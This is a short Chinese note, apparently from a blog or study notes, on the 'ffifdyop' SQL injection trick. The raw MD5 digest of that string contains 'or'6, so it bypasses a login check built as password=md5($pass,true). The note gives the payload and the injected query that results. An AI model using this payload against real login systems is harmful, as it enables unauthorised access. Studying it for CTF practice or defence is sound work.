sql

当md5遇到了sql会发生什么

ffifdyop

一个奇奇怪怪的字符串

经过md5加密后：276f722736c95d99e921722cf9ed621c

再转换为字符串：’or’6<乱码> 即 'or'66�]��!r,��b

用途：

面对

select * from 'admin' where password=md5($pass,true)

即可使用

select * from admin where password=''or'6<乱码>'

就相当于select * from admin where password=’’or 1 实现sql注入

参考博客https://blog.csdn.net/March97/article/details/81222922